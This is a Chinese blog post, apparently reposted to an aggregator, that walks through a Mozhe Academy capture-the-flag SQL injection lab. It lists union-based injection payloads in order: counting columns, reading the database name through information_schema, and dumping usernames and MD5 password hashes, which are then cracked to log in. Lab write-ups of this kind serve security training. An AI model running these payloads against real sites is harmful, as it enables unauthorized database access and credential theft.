当前位置:网站首页>墨者学院SQL注入解题
墨者学院SQL注入解题
2020-11-08 09:40:00 【osc_7bgz0no1】
一·判断注入
输入id=1,正常返回。输入id=-1返回错误。由 此可知存在注入。
二·判断字段
URL id=-1 order by 1
URL id=-1 order by 2
URL id=-1 order by 3
URL id=-1 order by 4
URL id=-1 order by 5 此时报错,说明有四个字段
三·使用union查询注入点
输入union select 1,2,3,4
发现2,3为显注点
四·使用database()查库名
输入 union select 1,database(),3,4
查出库名为 mozhe_Discuz_StormGroup
五·查表名
输入
union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=‘mozhe_Discuz_StormGroup’
查询到StormGroup_member,notice
看见member,所以对第一个产生怀疑。所以首先查询第一个。
六·查询StormGroup_member中的存放的字段
输入
union select 1,group_concat(column_name)3,4 from information_schema.columns where table_name=‘StormGroup_member’
查询出id,name,password,status
七·查询密码和用户名
union select 1,group_concat(name,0x3a,password),3,4 from StormGroup_member
得到md5加密后的值。进行解密,得到密码。
如果密码不对,通过limit m,n来继续查询。
八·提交key
得到密码后进行登录可以看见key,复制,提交。
版权声明
本文为[osc_7bgz0no1]所创,转载请带上原文链接,感谢
https://my.oschina.net/u/4415254/blog/4707940
边栏推荐
- Python3.9的7个特性
- Littlest JupyterHub| 02 使用nbgitpuller分发共享文件
- Python learning Day1 -- Basic Learning
- An error occurred while starting the kernel was successfully resolved
- November 07, 2020: given an array of positive integers, the sum of two numbers equals N and must exist. How to find the two numbers with the smallest multiplication?
- PCIe enumeration process
- Oops, the system is under attack again
- Basic concepts of computer network (5) basic principles of local area network
- Japan PSE certification
- vivoy73s和荣耀30青春版的区别
猜你喜欢
随机推荐
Introduction to ucgui
Littlest jupyterhub| 02 using nbgitpuller to distribute shared files
【原创】关于高版本poi autoSizeColumn方法异常的情况
1.深入Istio:Sidecar自动注入如何实现的?
Deeplight Technology Bluetooth protocol SRRC certification services
个人短网址生成平台 自定义域名、开启防红、统计访问量
shiyou的数值分析作业
2020-11-05
What is the difference between vivoy73s and vivoy70s
PX4添加新的应用
How does spotify drive data-driven decision making?
SQL Server 2008R2 18456 error resolution
Python loop distinction (while loop and for loop)
PCIe 枚举过程
python学习 day1——基础学习
vivoY73s和vivoY70s的区别 vivoY73s和vivoY70s哪个值得入手
Search and replace of sed
laravel8更新之速率限制改进
Mouse small hand
狗狗也能操作无人机!你没看错,不过这其实是架自动驾驶无人机 - 知乎